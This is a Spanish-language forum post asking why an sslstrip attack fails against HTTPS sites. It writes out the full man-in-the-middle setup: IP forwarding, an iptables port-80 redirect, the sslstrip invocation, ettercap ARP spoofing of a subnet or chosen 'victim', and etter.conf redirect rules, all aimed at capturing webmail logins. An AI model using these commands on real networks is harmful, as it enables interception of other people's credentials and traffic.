Tengo el siguiente problema, veran he estado probando en mi red local sslstrip y no consigo capturar trafico de los sitios https.
veran lo que hago es lo siguiente
como root
echo "1" > /proc/sys/net/ipv4/ip_forward
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sudo sslstrip -k -p -l 10000
sudo ettercap -Tq -M arp:remote -i eth1 // //
o si solo una victima
sudo ettercap -Tq -M arp:remote -i eth1 ipvictima iprouter
He probado con sitios que no son https y si funciona por lo que el mitm no es el problema, ahora cuando configuro el navegador a travez de proxy 127.0.0.1 10000, inicio sesion en hotmail o gmail en algunas de las maquinas victimas con o sin tener activado ettercap y y ahi si captura
me imagino que el problema radica en la redireccion del trafico en iptables pero no estoy seguro. tengo el archivo /etc/etter.conf editado de la siguiente manera
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
bueno es la parte que interesa de archivo... si alguien le ha sucedido o tiene idea... tengo instalado apache y el puerto que usa es el 80, he parado apache y aun asi no funciona